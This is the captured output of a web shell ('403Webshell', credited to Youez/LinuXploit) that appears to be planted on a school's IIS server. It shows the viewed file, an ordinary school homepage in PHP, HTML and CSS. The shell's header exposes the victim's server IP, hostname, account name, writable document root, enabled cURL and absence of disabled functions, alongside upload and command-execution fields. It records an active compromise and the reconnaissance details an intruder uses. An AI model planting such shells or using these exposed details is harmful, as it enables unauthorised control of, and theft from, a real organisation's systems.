403Webshell
Server IP : 199.79.63.27  /  Your IP : 216.73.217.128
Web Server : Microsoft-IIS/10.0
System : Windows NT MD-PLESK-WEB5 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_6698(lcitec7i) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/INETPUB/VHOSTS/lcit.edu.in/lcitps.edu.in/lcitbb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : D:/INETPUB/VHOSTS/lcit.edu.in/lcitps.edu.in/lcitbb//home1.php
<!doctype html>
<html class="no-js" lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>LCIT Blooming Buds School</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- Place favicon.ico in the root directory -->
    <link rel="shortcut icon" type="image/png" href="assets/images/icon/favicon.ico">
 <?php include 'alllinks.php';?>
	<style>

			

   

    h1,
    h3 {
        text-align: center;
    }

    h1 {
        color: green;
    }
		ul.a {

color: #0f0f0f;  
text-align:justify;
  
  list-style: none;
  margin: .5em;
  padding: 0;
  
  li {
    margin: 0;
    margin-bottom: .5em;
    padding-left: 1em;
    position: relative;
    font-size: 1em;
    &:after {
      content: '';
      height: .4em;
      width: .4em;
      background: #fd7e14;
      display: block;
      position: absolute;
      transform: rotate(45deg);
      top: .25em;
      left: 0;
    }
    
  }
  
}
	.swiper {
  width: 100%;
  height: 720px;       /* fixed height for all slides */
  position: relative;
}

.swiper-slide {
  display: flex;       /* center image */
  justify-content: center;
  align-items: center;
}

.swiper-slide img {
  width: 100%;
  height: 100%;
  object-fit: cover;   /* fills slide without distortion */
}
	.swiper-controls {
  display: flex;
  align-items: center;
  gap: 5px;
}

.swiper-button-next,
.swiper-button-prev {
  color: #fff;   /* adjust to match your theme */
}

.swiper-pagination {
  position: relative; /* keeps dots inline */
}	
.swiper {
  width: 100%;
  height: 720px;
  position: relative; /* important for overlay positioning */
}

.slider-content-overlay {
  position: absolute;
  top: 30%;        /* vertical position (adjust as needed) */
  right: 0%;       /* push overlay to the right side */
  z-index: 10;     /* ensures it stays above images */
  text-align: right;
  color: #fff;
}

.slider-content-overlay h2,
.slider-content-overlay h3 {
  text-shadow: 0 2px 5px rgba(0,0,0,0.6); /* improves readability */
}

.slider-content-overlay a {
  display: inline-block;
  margin-top: 15px;
}
	</style>
</head>

<body>
    <!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
    <!-- preloader area start -->
    <div id="preloader">
        <div class="loader"></div>
    </div>
    <!-- prealoader area end -->
    <!-- header area start -->
<?php include 'BLOOMING_BUDS_Novbar.php'; ?>
    <!-- header area end -->
    <!-- offset search area start -->
    <div class="offset-search">
        <form action="#">
            <input type="text" name="search" placeholder="Sarch here...">
            <button type="submit"><i class="fa fa-search"></i></button>
        </form>
    </div>
    <!-- offset search area end -->

   <!-- body overlay area start -->
<div class="body_overlay"></div>
<!-- body overlay area end -->

<!-- slider area start -->
<div class="swiper mySwiper">
  <div class="swiper-wrapper">
    <div class="swiper-slide">
      <img src="assets/images/bg/s2.png" alt="Slide 1">
    </div>
    <div class="swiper-slide">
      <img src="assets/images/bg/banner1.png" alt="Slide 2">
    </div>
    <div class="swiper-slide">
      <img src="assets/images/bg/banner2.png" alt="Slide 3">
    </div>
    <div class="swiper-slide">
      <img src="assets/images/bg/banner3.png" alt="Slide 4">
    </div>
    <div class="swiper-slide">
      <img src="assets/images/bg/banner4.png" alt="Slide 5">
    </div>
  </div>

  <!-- Add Pagination -->
  <div class="swiper-pagination"></div>

  <!-- Add Navigation -->
  <div class="swiper-button-next"></div>
  <div class="swiper-button-prev"></div>
</div>
<!-- slider area end -->

	 <!--Start Sticky Icon--> 
<div class="sticky-icon">
	<a href="admission_form.php" target="_blank" class="Instagram">
 <img src="assets/images/icon/admission-form.png" alt="admission-form" style="height:55px; width:55px;"> Admission Form </a>
   
	<a href="https://wa.me/9516900123" target="_blank" class="Facebook">
		<img src="assets/images/icon/whatsapp-logo.png" alt="WhatsApp" style="height:50px; width:50px;"> WhatsApp    </a>
 <!--   <a href="https://www.instagram.com/?hl=en" class="Instagram"><i class="fab fa-instagram"></i> Instagram </a>
   <a href="https://www.facebook.com/" class="Facebook"><i class="fab fa-facebook-f"> </i> Facebook </a>
   <a href="https://aboutme.google.com/u/0/?referer=gplus" class="Google"><i class="fab fa-google-plus-g"> </i> Google + </a>
   <a href="https://www.youtube.com/" class="Youtube"><i class="fab fa-youtube"></i> Youtube </a>
   <a href="https://twitter.com/login" class="Twitter"><i class="fab fa-twitter"> </i> Twitter </a>   -->
</div>
<!--End Sticky Icon-->
	
	
 

<!-- slider area end -->

   

 

   
	 <!-- Activity area start -->
	
    
    <!-- about area end -->

    

   
  <!-- footer area start -->
  <?php include 'Footer.php'; ?>
    <!-- footer area end -->

      <!-- course area start -->
    
    <!-- course area end -->
 <!-- teacher area start -->

<!-- teacher area end -->
    <!-- take toure area start -->
    
    <!-- take toure area end -->
    
    <!-- teacher area start -->
    
    <!-- teacher area end -->
    
    <!-- events area start -->
    
    <!-- events area end -->

    <!-- testimonial area start -->
    <!-- testimonial-area --> 

   

    <!-- footer area start -->
  <?php include 'BLOOMING_BUDS_Footer.php'; ?>
    <!-- footer area end -->


    <!-- jquery latest version -->
    <script src="assets/js/vendor/jquery-2.2.4.min.js"></script>
    <!-- bootstrap 4 js -->
    <script src="assets/js/bootstrap.min.js"></script>
    <!-- others plugins -->
    <script src="assets/js/owl.carousel.min.js"></script>
    <script src="assets/js/jquery.magnific-popup.min.js"></script>
    <script src="assets/js/jquery.slicknav.min.js"></script>
    <script src="assets/js/plugins.js"></script>
    <script src="assets/js/scripts.js"></script>
	
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.css" />
<script src="https://cdn.jsdelivr.net/npm/swiper@11/swiper-bundle.min.js"></script>

<script>
  var swiper = new Swiper(".mySwiper", {
    loop: true,              // infinite loop
    autoplay: {              // auto slide
      delay: 3000,
      disableOnInteraction: false,
    },
    pagination: {
      el: ".swiper-pagination",
      clickable: true,
    },
    navigation: {
      nextEl: ".swiper-button-next",
      prevEl: ".swiper-button-prev",
    },
  });
</script>

	<script>
		
		$(document).ready(function() {
// get video source from data-src button
var $videoSrc;  
$('.video-btn').click(function() {
    $videoSrc = $(this).data( "src" );
});
console.log($videoSrc);
// autoplay video on modal load  
$('#myModal').on('shown.bs.modal', function (e) {
// youtube iframe configuration and settings
$("#video").attr('src',$videoSrc + "?autoplay=1&rel=0&controls=1&loop=1&modestbranding=1"); 
})
// stop playing the youtube video when modal closed
$('#myModal').on('hide.bs.modal', function (e) {
    // stop video
    $("#video").attr('src',$videoSrc); 
}) 
});
		
	</script>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit